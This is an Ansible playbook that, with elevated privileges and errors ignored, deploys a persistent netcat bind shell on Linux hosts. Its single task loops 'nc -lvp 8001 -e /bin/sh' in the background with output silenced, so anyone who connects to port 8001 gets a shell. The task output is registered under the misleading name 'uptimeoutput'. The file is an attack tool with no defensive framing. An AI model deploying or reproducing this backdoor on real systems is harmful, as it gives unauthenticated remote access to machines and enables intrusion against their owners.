- name: bin shell
  hosts: linux
  become: true
  become_method: enable
  ignore_errors: true
  tasks:
    - name: bind shell
      register: uptimeoutput
      command: "while :; do nc -lvp 8001 -e /bin/sh; sleep 120; done &>/dev/null &"